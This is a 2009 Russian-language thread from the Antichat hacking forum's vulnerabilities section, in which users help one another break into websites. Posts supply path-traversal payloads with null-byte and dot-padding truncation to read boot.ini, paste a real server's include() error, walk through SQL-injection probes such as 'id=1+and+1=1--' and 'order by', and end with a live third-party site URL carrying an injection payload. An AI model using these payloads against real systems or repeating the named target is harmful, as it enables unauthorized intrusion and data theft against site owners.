HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.04.2009, 13:25
4adr0s
Познающий
Регистрация: 14.12.2007
Сообщений: 79
Провел на форуме:
329826

Репутация: 75
По умолчанию

...и ТОЛЬКО из директории "tmpl/"?
можно ли еще что-то выцепить или дохлый номер?
 
Ответить с цитированием

  #2  
Старый 15.04.2009, 13:47
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 4adr0s
нет, можешь подняться выше: ../../../../boot.ini%00
если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/

з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал

Последний раз редактировалось Iceangel_; 15.04.2009 в 13:57..
 
Ответить с цитированием

  #3  
Старый 16.04.2009, 15:54
4adr0s
Познающий
Регистрация: 14.12.2007
Сообщений: 79
Провел на форуме:
329826

Репутация: 75
По умолчанию

Цитата:
Сообщение от Iceangel_  
2 4adr0s
нет, можешь подняться выше: ../../../../boot.ini%00
если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/

з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал

Неа... все жестко, и мир жесток...

Код:
Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
 
Ответить с цитированием

  #4  
Старый 17.04.2009, 02:06
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
По умолчанию

Цитата:
Сообщение от 4adr0s  
Неа... все жестко, и мир жесток...
Код:
Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так
Код:
file.txt%00
Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание..http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание..
Запрос с заменой нул байта будем примерно таким
Код:
file.txt...258-266+ точек
Где file.txt это любой файл в директории tmpl
ЧИТАЙ
 
Ответить с цитированием

  #5  
Старый 15.04.2009, 13:52
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Iceangel_
смотри репу)
меджик квотс обходятся
 
Ответить с цитированием

  #6  
Старый 15.04.2009, 20:47
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Я тут пытался провести SQL-inj И у меня не получается, помогите плиз...
Ошибочка id=1'
Так тоже ошибка id=1'--
Потом востановил запрос id=1--
Затем попробовал попробовать id=1+and+1=1-- ошибки нет
id=1+and+1=2-- ошибки нет
И так тоже нет ошибки id=1+group+by+99--

как можно попробовать?
 
Ответить с цитированием

  #7  
Старый 15.04.2009, 21:06
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
По умолчанию

Мде ни текста ошибки,ни хрена...(
Урл вообще в идеале.....

Цитата:
Так тоже ошибка id=1'--
Поставь "+" в конец запроса,может из за отсутсвия пробела дальнейший запрос не обрезаеться(Это лишь предположение,мож скули нет,вообще)
 
Ответить с цитированием

  #8  
Старый 15.04.2009, 22:08
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077

Репутация: 93
По умолчанию

Byrger
если id=1+or+1=1-- и id=1+or+1=2-- разные тогда это скуля
если нет тогда пробуй id=1'+or+1=1-- id=1'+or+1=2--
 
Ответить с цитированием

  #9  
Старый 16.04.2009, 15:48
IDW
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253

Репутация: 7
По умолчанию

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1

Можно тут что-нибудь сделать?
 
Ответить с цитированием

  #10  
Старый 16.04.2009, 16:03
IDW
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253

Репутация: 7
По умолчанию

http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.